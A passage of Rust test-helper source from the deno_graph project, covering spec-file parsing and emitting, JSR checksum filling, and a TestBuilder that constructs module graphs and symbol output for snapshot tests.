  let uses_js_entrypoint = spec.files.iter().any(|f| f.specifier == "mod.js");
  if uses_js_entrypoint {
    builder.entry_point("file:///mod.js");
    builder.entry_point_types("file:///mod.d.ts");
  }
  if let Some(options) = &spec.options {
    if let Some(entrypoint) = &options.entrypoint {
      builder.entry_point(entrypoint);
    }
    builder.workspace_fast_check(options.workspace_fast_check);
  }
  builder.with_loader(|loader| add_spec_files_to_loader(&spec.files, loader));

  let runtime = tokio::runtime::Builder::new_current_thread()
    .enable_all()
    .build()
    .unwrap();
  let result = runtime.block_on(builder.symbols());

  // With UPDATE=1 the spec file is rewritten to contain the actual output.
  if std::env::var("UPDATE").as_deref() == Ok("1") {
    spec.output_file.content = SpecFileContent::Inline(result.output.clone());
    std::fs::write(&test.path, spec.emit()).unwrap();
  }
  assert_eq!(
    &result.output,
    spec.output_file.content.as_str(),
    "Should be same for {}",
    test.path.display()
  );
}
/// Options parsed from the JSON inside a spec file's leading `~~ … ~~` line.
///
/// Field order matters for serialization: `Spec::emit` writes these back
/// with serde, so keep the declaration order stable.
#[derive(Debug, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct SpecOptions {
  /// Overrides the default graph entry point (`file:///mod.ts`).
  #[serde(default)]
  #[serde(skip_serializing_if = "Option::is_none")]
  pub entrypoint: Option<String>,
  /// Forwarded to the builder's JSR version resolver.
  #[serde(default)]
  #[serde(skip_serializing_if = "Option::is_none")]
  pub newest_dependency_date: Option<NewestDependencyDateOptions>,
  /// Remote specifier -> expected checksum entries seeded into the locker.
  #[serde(default)]
  #[serde(skip_serializing_if = "Option::is_none")]
  pub remote_checksums: Option<HashMap<String, String>>,
  /// Package name@version -> manifest checksum entries seeded into the locker.
  #[serde(default)]
  #[serde(skip_serializing_if = "Option::is_none")]
  pub pkg_checksums: Option<HashMap<String, String>>,
  /// Runs fast check for all workspace members.
  #[serde(default)]
  #[serde(skip_serializing_if = "is_false")]
  pub workspace_fast_check: bool,
  /// Enables the test fast check cache (its contents are dumped in output).
  #[serde(default)]
  #[serde(skip_serializing_if = "is_false")]
  pub fast_check_cache: bool,
  /// Skips analyzing dynamic dependencies while building the graph.
  #[serde(default)]
  #[serde(skip_serializing_if = "is_false")]
  pub skip_dynamic_deps: bool,
  /// Enables `import … with { type: "bytes" }` support.
  #[serde(default)]
  #[serde(skip_serializing_if = "is_false")]
  pub unstable_bytes_imports: bool,
  /// Enables `import … with { type: "text" }` support.
  #[serde(default)]
  #[serde(skip_serializing_if = "is_false")]
  pub unstable_text_imports: bool,
}
/// serde `skip_serializing_if` helper: a `bool` field is omitted from the
/// serialized options when it is `false`.
fn is_false(v: &bool) -> bool {
  !*v
}
/// A fully parsed spec test file.
pub struct Spec {
  /// Options from the optional `~~ {json} ~~` header line.
  pub options: Option<SpecOptions>,
  /// The input files (every section except the special ones below).
  pub files: Vec<SpecFile>,
  /// The `# output` section the test asserts against.
  pub output_file: SpecFile,
  /// Parsed from the `# workspace_members` JSON section, if present.
  pub workspace_members: Vec<WorkspaceMember>,
  /// Parsed from the `# lockfile_jsr_packages` JSON section, if present.
  pub lockfile_jsr_packages: BTreeMap<PackageReq, PackageNv>,
}
impl Spec {
  /// Serializes the spec back into its on-disk textual format. Used when
  /// `UPDATE=1` rewrites a spec file; section order here defines the
  /// canonical file layout.
  pub fn emit(&self) -> String {
    let mut text = String::new();
    if let Some(options) = &self.options {
      text.push_str("~~ ");
      // pretty-print the options when they contain checksum maps so the
      // header line stays readable
      if options.remote_checksums.is_some() || options.pkg_checksums.is_some() {
        text.push_str(&serde_json::to_string_pretty(options).unwrap());
      } else {
        text.push_str(&serde_json::to_string(options).unwrap());
      }
      text.push_str(" ~~");
      text.push('\n');
    }
    if !self.workspace_members.is_empty() {
      text.push_str("# workspace_members\n");
      text.push_str(
        &serde_json::to_string_pretty(&self.workspace_members).unwrap(),
      );
      text.push_str("\n\n");
    }
    for file in &self.files {
      text.push_str(&file.emit());
      text.push('\n');
    }
    text.push_str(&self.output_file.emit());
    if !text.ends_with('\n') {
      text.push('\n');
    }
    if !self.lockfile_jsr_packages.is_empty() {
      text.push_str("\n# lockfile_jsr_packages\n");
      text.push_str(
        &serde_json::to_string_pretty(&self.lockfile_jsr_packages).unwrap(),
      );
      text.push('\n');
    }
    text
  }

  /// Fills the `manifest` field in the `_meta.json` files with the checksums
  /// so that we don't need to bother having them in the tests.
  pub fn fill_jsr_meta_files_with_checksums(&mut self) {
    for (nv, checksums_by_files) in self.get_jsr_checksums() {
      let base_specifier =
        recommended_registry_package_url(&DEFAULT_JSR_URL, &nv);
      let meta_file = base_specifier
        .join(&format!("../{}_meta.json", nv.version))
        .unwrap();
      // locate the `<version>_meta.json` spec file for this package
      let meta_file = self
        .files
        .iter_mut()
        .find(|f| f.url() == meta_file)
        .unwrap_or_else(|| panic!("Could not find in specs: {}", meta_file));
      let mut meta_value = serde_json::from_str::<
        BTreeMap<String, serde_json::Value>,
      >(meta_file.content.as_str())
      .unwrap();
      let manifest = meta_value
        .entry("manifest".to_string())
        .or_insert_with(|| serde_json::Value::Object(Default::default()))
        .as_object_mut()
        .unwrap();
      // only add checksums for entries the spec didn't already specify
      for (file, checksum) in checksums_by_files {
        if !manifest.contains_key(&file) {
          manifest.insert(file, checksum);
        }
      }
      // use the original text as the emit text so we don't
      // end up with these hashes in the output
      meta_file.emit_text = Some(
        std::mem::replace(
          &mut meta_file.content,
          SpecFileContent::Inline(
            serde_json::to_string_pretty(&meta_value).unwrap(),
          ),
        )
        .as_str()
        .to_string(),
      );
    }
  }

  /// Computes a `{ size, checksum }` manifest entry for every spec file that
  /// lives under a JSR package URL, grouped by package name and version.
  pub fn get_jsr_checksums(
    &self,
  ) -> BTreeMap<PackageNv, BTreeMap<String, serde_json::Value>> {
    let mut checksums_by_package: BTreeMap<
      PackageNv,
      BTreeMap<String, serde_json::Value>,
    > = Default::default();
    for file in &self.files {
      if let Some(nv) =
        recommended_registry_package_url_to_nv(&DEFAULT_JSR_URL, &file.url())
      {
        let base_specifier =
          recommended_registry_package_url(&DEFAULT_JSR_URL, &nv);
        // key by the path relative to the package root (the trailing slash is
        // stripped from the base, so the key keeps its leading slash)
        let relative_url = file
          .url()
          .to_string()
          .strip_prefix(base_specifier.to_string().strip_suffix('/').unwrap())
          .unwrap()
          .to_string();
        checksums_by_package.entry(nv.clone()).or_default().insert(
          relative_url,
          serde_json::json!({
            "size": file.content.len(),
            "checksum": format!("sha256-{}", LoaderChecksum::r#gen(file.content.as_ref())),
          }),
        );
      }
    }
    checksums_by_package
  }
}
/// Registers every spec file with the test loader, routing `cache:`-prefixed
/// specifiers to the cache loader and everything else to the remote loader.
fn add_spec_files_to_loader(
  files: &[crate::SpecFile],
  loader: &mut TestLoader,
) {
  for file in files {
    let url = file.url();
    let source = if let Some(location) = file.headers.get("location") {
      // A `location` header turns the entry into a redirect; relative
      // targets are resolved against the file's own URL.
      let target = if location.starts_with("./") {
        url.join(location).unwrap().to_string()
      } else {
        location.to_string()
      };
      Source::Redirect(target)
    } else {
      Source::Module {
        specifier: url.to_string(),
        maybe_headers: Some(file.headers.clone().into_iter().collect()),
        content: file.content.clone(),
      }
    };
    let destination = if file.is_cache() {
      &mut loader.cache
    } else {
      &mut loader.remote
    };
    destination.add_source(url, source);
  }
}
/// Lazily-read contents of a file referenced by a `# specifier <= path` line.
#[derive(Debug)]
pub struct SpecFileSource {
  // path as written in the spec file (relative to the spec file's folder)
  specified_path: String,
  // path of the spec file itself; the source path is resolved relative to it
  referrer_path: PathBuf,
  // lazily-decoded UTF-8 view of `bytes`
  text: OnceCell<String>,
  // lazily-read raw file contents
  bytes: OnceCell<Vec<u8>>,
}
impl SpecFileSource {
fn new(specified_path: String, referrer_path: PathBuf) -> Self {
Self {
specified_path,
referrer_path,
text: Default::default(),
bytes: Default::default(),
}
}
fn text(&self) -> &String {
self
.text
.get_or_init(|| String::from_utf8_lossy(self.bytes()).to_string())
}
fn bytes(&self) -> &Vec<u8> {
self.bytes.get_or_init(|| {
std::fs::read(deno_path_util::normalize_path(Cow::Owned(
self.referrer_path.join("..").join(&self.specified_path),
)))
.unwrap()
})
}
fn len(&self) -> usize {
self.bytes().len()
}
}
/// Content of a spec file section: either inline text from the spec file
/// itself or a lazily-read reference to an external file on disk.
#[derive(Debug, Clone)]
pub enum SpecFileContent {
  Inline(String),
  Source(Rc<SpecFileSource>),
}
impl SpecFileContent {
fn as_str(&self) -> &str {
match self {
Self::Inline(s) => s.as_str(),
Self::Source(s) => s.text(),
}
}
fn len(&self) -> usize {
match self {
Self::Inline(s) => s.len(),
Self::Source(s) => s.len(),
}
}
}
impl AsRef<str> for SpecFileContent {
fn as_ref(&self) -> &str {
self.as_str()
}
}
impl AsRef<[u8]> for SpecFileContent {
fn as_ref(&self) -> &[u8] {
match self {
Self::Inline(s) => s.as_bytes(),
Self::Source(s) => s.bytes(),
}
}
}
/// A single `# specifier` section of a spec file.
#[derive(Debug)]
pub struct SpecFile {
  /// The specifier as written (may carry a `cache:` prefix).
  pub specifier: String,
  /// The section body (inline text or an external file reference).
  pub content: SpecFileContent,
  /// Text to use when emitting the spec file.
  pub emit_text: Option<String>,
  /// Headers parsed from the optional `HEADERS: {json}` line.
  pub headers: IndexMap<String, String>,
}
impl SpecFile {
  /// Renders this section back into spec-file syntax: a `# specifier`
  /// header, an optional `HEADERS:` line, then the body (or a
  /// `# specifier <= path` one-liner for externally-sourced files).
  pub fn emit(&self) -> String {
    match &self.content {
      SpecFileContent::Source(source) => {
        format!("# {} <= {}\n", &self.specifier, &source.specified_path)
      }
      SpecFileContent::Inline(content) => {
        let mut text = format!("# {}\n", self.specifier);
        if !self.headers.is_empty() {
          text.push_str(&format!(
            "HEADERS: {}\n",
            serde_json::to_string(&self.headers).unwrap()
          ));
        }
        let body = self.emit_text.as_deref().unwrap_or(content.as_str());
        text.push_str(body);
        text
      }
    }
  }

  /// The specifier as a URL; scheme-less specifiers (after dropping any
  /// `cache:` prefix) are treated as `file:///` paths.
  pub fn url(&self) -> Url {
    let specifier = self
      .specifier
      .strip_prefix("cache:")
      .unwrap_or(&self.specifier);
    let has_scheme = ["http:", "https:", "file:"]
      .iter()
      .any(|scheme| specifier.starts_with(scheme));
    if has_scheme {
      Url::parse(specifier).unwrap()
    } else {
      Url::parse(&format!("file:///{}", specifier)).unwrap()
    }
  }

  /// Whether this file should be registered with the cache loader.
  pub fn is_cache(&self) -> bool {
    self.specifier.starts_with("cache:")
  }
}
/// Parses the textual spec format into a [`Spec`].
///
/// Format:
/// - an optional leading `~~ {json options} ~~` line,
/// - `# <specifier>` lines starting each file section,
/// - the `# <specifier> <= <path>` form reads the body from an external file
///   instead of inline text,
/// - an optional `HEADERS: {json}` line per file,
/// - every other line is appended to the current file's inline content.
///
/// The `output`, `workspace_members` and `lockfile_jsr_packages` sections are
/// pulled out of the file list into dedicated fields.
///
/// # Panics
/// Panics on malformed input (no `# output` section, inline content for an
/// externally-sourced file, invalid JSON, content before the first `#`
/// header) since this is test-only parsing.
pub fn parse_spec(path: &Path, text: String) -> Spec {
  let mut files = Vec::new();
  let mut current_file = None;
  let mut options: Option<SpecOptions> = None;
  let mut text = text.as_str();
  if text.starts_with("~~ ") {
    let end = text.find(" ~~\n").unwrap();
    options = Some(serde_json::from_str(&text[3..end]).unwrap());
    text = &text[end + 4..];
  }
  for line in text.split('\n') {
    if let Some(specifier_line) = line.strip_prefix("# ") {
      // a new section starts; flush the previous one
      if let Some(file) = current_file.take() {
        files.push(file);
      }
      if let Some((specifier, resource_path)) = specifier_line.split_once("<=")
      {
        let specifier = specifier.trim();
        let resource_path = resource_path.trim();
        current_file = Some(SpecFile {
          specifier: specifier.to_string(),
          content: SpecFileContent::Source(Rc::new(SpecFileSource::new(
            resource_path.to_string(),
            path.to_path_buf(),
          ))),
          emit_text: None,
          headers: Default::default(),
        });
      } else {
        current_file = Some(SpecFile {
          specifier: specifier_line.to_string(),
          content: SpecFileContent::Inline(String::new()),
          emit_text: None,
          headers: Default::default(),
        });
      }
    } else if let Some(headers) = line.strip_prefix("HEADERS: ") {
      current_file.as_mut().unwrap().headers =
        serde_json::from_str(headers).unwrap();
    } else {
      let current_file = current_file.as_mut().unwrap();
      match &mut current_file.content {
        SpecFileContent::Inline(content) => {
          if !content.is_empty() {
            content.push('\n');
          }
          content.push_str(line);
        }
        SpecFileContent::Source(_) => {
          // externally-sourced sections must have an empty inline body
          if !line.is_empty() {
            panic!(
              "Error parsing spec: Unexpected inline input for specifier \"{}\", which was set to be read from an external file.",
              // fix: this was mojibake'd to `¤t_file` (HTML entity
              // garbling of `&curren`) which does not compile
              &current_file.specifier
            );
          }
        }
      }
    }
  }
  files.push(current_file.unwrap());
  let output_file =
    files.remove(files.iter().position(|f| f.specifier == "output").unwrap());
  let workspace_members = take_file(&mut files, "workspace_members");
  let lockfile_jsr_packages = take_file(&mut files, "lockfile_jsr_packages");
  Spec {
    options,
    files,
    output_file,
    workspace_members,
    lockfile_jsr_packages,
  }
}
/// Removes the spec file section named `name` (if present) and deserializes
/// its JSON body; returns `T::default()` when the section is absent.
fn take_file<T: Default + DeserializeOwned>(
  files: &mut Vec<SpecFile>,
  name: &str,
) -> T {
  match files.iter().position(|f| f.specifier == name) {
    Some(index) => {
      let file = files.remove(index);
      serde_json::from_slice(file.content.as_ref()).unwrap()
    }
    None => T::default(),
  }
}
fn indent(text: &str) -> String {
text
.split('\n')
.map(|l| format!(" {}", l).trim_end().to_string())
.collect::<Vec<_>>()
.join("\n")
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/tests/helpers/mod.rs | tests/helpers/mod.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::borrow::Cow;
use std::cell::RefCell;
use std::collections::BTreeMap;
use std::sync::Arc;
use async_trait::async_trait;
use deno_ast::ModuleSpecifier;
use deno_graph::GraphKind;
use deno_graph::ModuleGraph;
use deno_graph::NpmLoadError;
use deno_graph::NpmResolvePkgReqsResult;
use deno_graph::WorkspaceFastCheckOption;
use deno_graph::WorkspaceMember;
use deno_graph::ast::CapturingModuleAnalyzer;
use deno_graph::fast_check::FastCheckCache;
use deno_graph::fast_check::FastCheckCacheItem;
use deno_graph::fast_check::FastCheckCacheKey;
use deno_graph::packages::JsrVersionResolver;
use deno_graph::packages::NewestDependencyDateOptions;
use deno_graph::source::CacheInfo;
use deno_graph::source::CacheSetting;
use deno_graph::source::HashMapLocker;
use deno_graph::source::LoadFuture;
use deno_graph::source::LoadOptions;
use deno_graph::source::Loader;
use deno_graph::source::LoaderChecksum;
use deno_graph::source::Locker;
use deno_graph::source::MemoryLoader;
use deno_graph::source::NpmResolver;
use deno_semver::Version;
use deno_semver::jsr::JsrPackageReqReference;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageReq;
use futures::FutureExt;
/// Loader used by the spec tests: `cache:`-prefixed spec files are
/// registered in `cache`, everything else in `remote`.
#[derive(Default)]
pub struct TestLoader {
  pub cache: MemoryLoader,
  pub remote: MemoryLoader,
}
impl Loader for TestLoader {
  fn get_cache_info(&self, specifier: &ModuleSpecifier) -> Option<CacheInfo> {
    self.cache.get_cache_info(specifier)
  }

  /// Loads a module from the appropriate in-memory loader and, when a
  /// checksum was requested, verifies the loaded content against it.
  fn load(
    &self,
    specifier: &ModuleSpecifier,
    options: LoadOptions,
  ) -> LoadFuture {
    let checksum = options.maybe_checksum.clone();
    // pick the backing loader based on the cache setting
    let future = match options.cache_setting {
      // todo(dsherret): in the future, actually make this use the cache
      CacheSetting::Use => self.remote.load(specifier, options),
      // todo(dsherret): in the future, make this update the cache
      CacheSetting::Reload => self.remote.load(specifier, options),
      CacheSetting::Only => self.cache.load(specifier, options),
    };
    async move {
      let response = future.await?;
      // enforce the expected checksum on successfully loaded modules
      if let Some(deno_graph::source::LoadResponse::Module { content, .. }) =
        &response
        && let Some(checksum) = checksum
      {
        checksum.check_source(content)?;
      }
      Ok(response)
    }
    .boxed_local()
  }
}
#[cfg(feature = "symbols")]
pub mod symbols {
pub struct SymbolsResult {
#[allow(unused)]
pub output: String,
}
}
/// Everything produced by `TestBuilder::build`.
pub struct BuildResult {
  // the locker used during the build (cloned), when one was configured
  #[allow(unused)]
  pub locker: Option<HashMapLocker>,
  pub graph: ModuleGraph,
  // analyzer that captured module info/ASTs during the build
  pub analyzer: CapturingModuleAnalyzer,
  // populated only when the fast check cache was enabled
  #[allow(unused)]
  pub fast_check_cache: Option<TestFastCheckCache>,
}
#[cfg(feature = "symbols")]
impl BuildResult {
pub fn root_symbol(&self) -> deno_graph::symbols::RootSymbol<'_> {
self.graph.valid().unwrap(); // assert valid
deno_graph::symbols::RootSymbol::new(&self.graph, &self.analyzer)
}
}
/// Stub npm resolver used by the test builder.
#[derive(Debug)]
pub struct TestNpmResolver;
#[async_trait(?Send)]
impl NpmResolver for TestNpmResolver {
  fn load_and_cache_npm_package_info(&self, _package_name: &str) {}

  /// Resolves each requirement by parsing its version requirement text as an
  /// exact npm version — a test-only shortcut that avoids any registry
  /// lookups, so specs must use fully-resolved version reqs.
  async fn resolve_pkg_reqs(
    &self,
    package_reqs: &[PackageReq],
  ) -> NpmResolvePkgReqsResult {
    // for now, this requires version reqs that are resolved
    let mut results = Vec::with_capacity(package_reqs.len());
    for pkg_req in package_reqs {
      let parsed = Version::parse_from_npm(&pkg_req.version_req.to_string());
      results.push(match parsed {
        Ok(version) => Ok(PackageNv {
          name: pkg_req.name.clone(),
          version,
        }),
        Err(err) => Err(NpmLoadError::PackageReqResolution(Arc::new(err))),
      });
    }
    NpmResolvePkgReqsResult {
      results,
      dep_graph_result: Ok(()),
    }
  }
}
/// In-memory fast check cache whose contents get dumped into test output.
#[derive(Default)]
pub struct TestFastCheckCache {
  // BTreeMap because the cache items are inserted non-deterministically
  pub inner: RefCell<BTreeMap<FastCheckCacheKey, FastCheckCacheItem>>,
}
impl FastCheckCache for TestFastCheckCache {
  /// Fixed seed so cache keys are stable across test runs.
  fn hash_seed(&self) -> &'static str {
    "stable-for-tests"
  }

  fn get(&self, key: FastCheckCacheKey) -> Option<FastCheckCacheItem> {
    let items = self.inner.borrow();
    items.get(&key).cloned()
  }

  fn set(&self, key: FastCheckCacheKey, value: FastCheckCacheItem) {
    let mut items = self.inner.borrow_mut();
    items.insert(key, value);
  }
}
/// Fluent builder that assembles a module graph from in-memory sources for
/// the spec tests.
pub struct TestBuilder {
  // created lazily via `ensure_locker` / the checksum setters
  locker: Option<HashMapLocker>,
  graph: ModuleGraph,
  loader: TestLoader,
  // root module specifier used when building the graph
  entry_point: String,
  // specifier whose exports are inspected by `symbols()`
  entry_point_types: String,
  fast_check_cache: bool,
  lockfile_jsr_packages: BTreeMap<PackageReq, PackageNv>,
  newest_dependency_date: NewestDependencyDateOptions,
  // optional custom resolver (mutually exclusive with workspace members)
  resolver: Option<Box<dyn deno_graph::source::Resolver>>,
  skip_dynamic_deps: bool,
  workspace_members: Vec<WorkspaceMember>,
  workspace_fast_check: bool,
  unstable_bytes_imports: bool,
  unstable_text_imports: bool,
}
impl TestBuilder {
  /// Creates a builder with `file:///mod.ts` as both the entry point and the
  /// types entry point and everything else defaulted/disabled.
  pub fn new() -> Self {
    Self {
      locker: Default::default(),
      graph: ModuleGraph::new(GraphKind::All),
      loader: Default::default(),
      entry_point: "file:///mod.ts".to_string(),
      entry_point_types: "file:///mod.ts".to_string(),
      fast_check_cache: false,
      lockfile_jsr_packages: Default::default(),
      newest_dependency_date: Default::default(),
      skip_dynamic_deps: false,
      resolver: None,
      workspace_members: Default::default(),
      workspace_fast_check: false,
      unstable_bytes_imports: false,
      unstable_text_imports: false,
    }
  }

  /// Gives mutable access to the underlying loaders so callers can register
  /// in-memory sources.
  pub fn with_loader(
    &mut self,
    mut action: impl FnMut(&mut TestLoader),
  ) -> &mut Self {
    action(&mut self.loader);
    self
  }

  #[allow(unused)]
  pub fn entry_point(&mut self, value: impl AsRef<str>) -> &mut Self {
    self.entry_point = value.as_ref().to_string();
    self
  }

  #[allow(unused)]
  pub fn entry_point_types(&mut self, value: impl AsRef<str>) -> &mut Self {
    self.entry_point_types = value.as_ref().to_string();
    self
  }

  #[allow(unused)]
  pub fn newest_dependency_date(
    &mut self,
    value: NewestDependencyDateOptions,
  ) -> &mut Self {
    self.newest_dependency_date = value;
    self
  }

  #[allow(unused)]
  pub fn lockfile_jsr_packages(
    &mut self,
    lockfile_jsr_packages: BTreeMap<PackageReq, PackageNv>,
  ) -> &mut Self {
    self.lockfile_jsr_packages = lockfile_jsr_packages;
    self
  }

  #[allow(unused)]
  pub fn fast_check_cache(&mut self, value: bool) -> &mut Self {
    self.fast_check_cache = value;
    self
  }

  #[allow(unused)]
  pub fn resolver(
    &mut self,
    resolver: impl deno_graph::source::Resolver + 'static,
  ) -> &mut Self {
    self.resolver = Some(Box::new(resolver));
    self
  }

  #[allow(unused)]
  pub fn skip_dynamic_deps(&mut self, value: bool) -> &mut Self {
    self.skip_dynamic_deps = value;
    self
  }

  #[allow(unused)]
  pub fn workspace_members(
    &mut self,
    members: Vec<WorkspaceMember>,
  ) -> &mut Self {
    self.workspace_members = members;
    self
  }

  #[allow(unused)]
  pub fn workspace_fast_check(&mut self, value: bool) -> &mut Self {
    self.workspace_fast_check = value;
    self
  }

  #[allow(unused)]
  pub fn unstable_bytes_imports(&mut self, value: bool) -> &mut Self {
    self.unstable_bytes_imports = value;
    self
  }

  #[allow(unused)]
  pub fn unstable_text_imports(&mut self, value: bool) -> &mut Self {
    self.unstable_text_imports = value;
    self
  }

  /// Ensures a locker exists (creates an empty one on first call).
  #[allow(unused)]
  pub fn ensure_locker(&mut self) -> &mut Self {
    self.locker.get_or_insert_with(Default::default);
    self
  }

  /// Seeds the locker with an expected checksum for a remote specifier.
  #[allow(unused)]
  pub fn add_remote_checksum(
    &mut self,
    specifier: &str,
    checksum: &str,
  ) -> &mut Self {
    let specifier = ModuleSpecifier::parse(specifier).unwrap();
    let loader_checksum = LoaderChecksum::new(checksum.to_string());
    let checksums = self.locker.get_or_insert_with(Default::default);
    checksums.set_remote_checksum(&specifier, loader_checksum);
    self
  }

  /// Seeds the locker with an expected manifest checksum for a package.
  #[allow(unused)]
  pub fn add_pkg_manifest_checksum(
    &mut self,
    pkg_nv: &str,
    checksum: &str,
  ) -> &mut Self {
    let pkg_nv = PackageNv::from_str(pkg_nv).unwrap();
    let loader_checksum = LoaderChecksum::new(checksum.to_string());
    let checksums = self.locker.get_or_insert_with(Default::default);
    checksums.set_pkg_manifest_checksum(&pkg_nv, loader_checksum);
    self
  }

  /// Builds the module graph from the configured entry point and, when the
  /// graph has no module errors, also builds the fast check type graph.
  pub async fn build(&mut self) -> BuildResult {
    let mut graph = self.graph.clone();
    // pre-populate req -> nv mappings as if they came from a lockfile
    for (req, nv) in &self.lockfile_jsr_packages {
      graph.packages.add_nv(req.clone(), nv.clone());
    }
    let entry_point_url = ModuleSpecifier::parse(&self.entry_point).unwrap();
    let roots = vec![entry_point_url.clone()];
    let capturing_analyzer = CapturingModuleAnalyzer::default();
    let workspace_resolver = WorkspaceMemberResolver {
      members: self.workspace_members.clone(),
    };
    graph
      .build(
        roots.clone(),
        Vec::new(),
        &self.loader,
        deno_graph::BuildOptions {
          module_analyzer: &capturing_analyzer,
          npm_resolver: Some(&TestNpmResolver),
          locker: self.locker.as_mut().map(|l| l as _),
          resolver: Some(if let Some(resolver) = &self.resolver {
            // providing a custom resolver while using workspace members hasn't been implemented
            assert_eq!(self.workspace_members.len(), 0);
            &**resolver
          } else {
            &workspace_resolver
          }),
          skip_dynamic_deps: self.skip_dynamic_deps,
          unstable_bytes_imports: self.unstable_bytes_imports,
          unstable_text_imports: self.unstable_text_imports,
          jsr_version_resolver: Cow::Owned(JsrVersionResolver {
            newest_dependency_date_options: self.newest_dependency_date.clone(),
          }),
          ..Default::default()
        },
      )
      .await;
    let fast_check_cache = if self.fast_check_cache {
      Some(TestFastCheckCache::default())
    } else {
      None
    };
    if graph.module_errors().next().is_none() {
      graph.build_fast_check_type_graph(
        deno_graph::BuildFastCheckTypeGraphOptions {
          fast_check_cache: fast_check_cache.as_ref().map(|c| c as _),
          fast_check_dts: !self.fast_check_cache,
          jsr_url_provider: Default::default(),
          es_parser: Some(&capturing_analyzer),
          resolver: None,
          workspace_fast_check: if self.workspace_fast_check {
            WorkspaceFastCheckOption::Enabled(&self.workspace_members)
          } else {
            WorkspaceFastCheckOption::Disabled
          },
        },
      );
    }
    BuildResult {
      locker: self.locker.clone(),
      graph,
      analyzer: capturing_analyzer,
      fast_check_cache,
    }
  }

  /// Builds the graph, runs symbol analysis on every module, sanity-checks
  /// the symbol tree, and renders the result as text for comparison against
  /// the spec's expected output.
  #[allow(unused)]
  #[cfg(feature = "symbols")]
  pub async fn symbols(&mut self) -> symbols::SymbolsResult {
    // returns sanity-check failures for a module's symbol tree (these are
    // bugs in the analysis itself, not in the spec under test)
    fn check_fatal_diagnostics(
      module: deno_graph::symbols::ModuleInfoRef,
    ) -> Vec<String> {
      let mut results = Vec::new();
      for symbol in module.symbols() {
        // ensure all decls have the same name as their symbol
        {
          let maybe_name = symbol.maybe_name();
          for decl in symbol.decls() {
            if decl.maybe_name() != maybe_name {
              results.push(format!(
                "Symbol {:?} with name {:?} had a decl with a different name: {:?}",
                symbol.symbol_id(),
                maybe_name,
                decl.maybe_name(),
              ));
            }
          }
        }
        if let Some(parent_id) = symbol.parent_id() {
          let parent_symbol = module.symbol(parent_id).unwrap();
          let has_child =
            parent_symbol.child_ids().any(|id| id == symbol.symbol_id());
          let has_member = parent_symbol
            .members()
            .iter()
            .any(|id| *id == symbol.symbol_id());
          let is_definition_decl =
            symbol.decls().iter().all(|d| d.kind.is_definition());
          if is_definition_decl {
            // ensure it's possible to go from a parent to its child
            if !has_child && !has_member {
              results.push(format!(
                "Parent {:#?} does not have child {:#?}",
                parent_symbol.symbol_id(),
                symbol.symbol_id()
              ));
            }
          } else if has_child || has_member {
            results.push(format!(
              "Parent {:#?} should not have the child or member {:#?}",
              parent_symbol.symbol_id(),
              symbol.symbol_id()
            ));
          }
          if has_child && has_member {
            results.push(format!(
              "Parent {:?} should not have both a child and a member {:?}",
              parent_symbol.symbol_id(),
              symbol.symbol_id()
            ));
          }
        }
        // ensure it's possible to get the module symbol id
        {
          let mut parent = symbol;
          let mut i = 0;
          while let Some(parent_id) = parent.parent_id() {
            parent = module.symbol(parent_id).unwrap();
            // cap the walk to guard against parent-pointer cycles
            if i == 1000 {
              results.push(format!(
                "Could not find root from symbol: {:?}",
                symbol.symbol_id()
              ));
              break;
            }
            i += 1;
          }
        }
      }
      // from the root module, ensure everything is a tree
      fn ensure_no_multiple_paths(
        module: deno_graph::symbols::ModuleInfoRef,
        symbol: &deno_graph::symbols::Symbol,
        visited: &mut HashSet<deno_graph::symbols::SymbolId>,
      ) -> Vec<String> {
        let mut results = Vec::new();
        if !visited.insert(symbol.symbol_id()) {
          results.push(format!(
            "Found symbol in multiple paths: {:?}",
            symbol.symbol_id()
          ));
        } else {
          for id in symbol.child_ids().chain(symbol.members().iter().copied()) {
            let symbol = module.symbol(id).unwrap();
            results.extend(ensure_no_multiple_paths(module, symbol, visited));
          }
        }
        results
      }
      results.extend(ensure_no_multiple_paths(
        module,
        module.module_symbol(),
        &mut HashSet::new(),
      ));
      results
    }

    use std::collections::HashSet;

    use deno_graph::symbols::DefinitionOrUnresolved;
    use deno_graph::symbols::ModuleInfoRef;
    use deno_graph::symbols::ResolveDepsMode;

    let build_result = self.build().await;
    let graph = &build_result.graph;
    let entry_point_types_url =
      ModuleSpecifier::parse(&self.entry_point_types).unwrap();
    let root_symbol = build_result.root_symbol();
    symbols::SymbolsResult {
      output: {
        let entrypoint_symbol = root_symbol
          .module_from_specifier(&entry_point_types_url)
          .unwrap();
        let mut output_text = String::new();
        // sort for deterministic output
        let mut specifiers =
          graph.specifiers().map(|(s, _)| s).collect::<Vec<_>>();
        specifiers.sort_unstable();
        for specifier in specifiers {
          let Some(module) = root_symbol.module_from_specifier(specifier)
          else {
            continue;
          };
          let module_output_text = format!(
            "{}: {}\n",
            specifier.as_str(),
            match module {
              ModuleInfoRef::Esm(m) => format!("{:#?}", m),
              ModuleInfoRef::Json(m) => format!("{:#?}", m),
            }
          );
          output_text.push_str(&module_output_text);
          // renders "symbol_id:byte_range deps" lines for every decl that
          // has dependencies under the given resolve mode
          fn get_symbol_deps_text_for_mode(
            module: ModuleInfoRef<'_>,
            resolve_mode: ResolveDepsMode,
          ) -> String {
            let mut symbol_deps_text = String::new();
            for symbol in module.symbols() {
              for decl in symbol.decls() {
                if let Some((node, source)) = decl.maybe_node_and_source() {
                  let deps = node.deps(resolve_mode);
                  if !deps.is_empty() {
                    symbol_deps_text.push_str(&format!(
                      "{:?}:{:?} {:?}\n",
                      symbol.symbol_id(),
                      decl.range.as_byte_range(source.range().start),
                      deps
                    ));
                  }
                }
              }
            }
            symbol_deps_text
          }
          let symbol_deps_text = get_symbol_deps_text_for_mode(
            module,
            ResolveDepsMode::TypesAndExpressions,
          );
          if !symbol_deps_text.is_empty() {
            output_text.push_str(&format!(
              "== symbol deps (types and exprs) ==\n{}\n",
              symbol_deps_text
            ));
          }
          let symbol_deps_text =
            get_symbol_deps_text_for_mode(module, ResolveDepsMode::TypesOnly);
          if !symbol_deps_text.is_empty() {
            output_text.push_str(&format!(
              "== symbol deps (types only) ==\n{}\n",
              symbol_deps_text
            ));
          }
          // analyze the module graph for any problems
          let diagnostics = check_fatal_diagnostics(module);
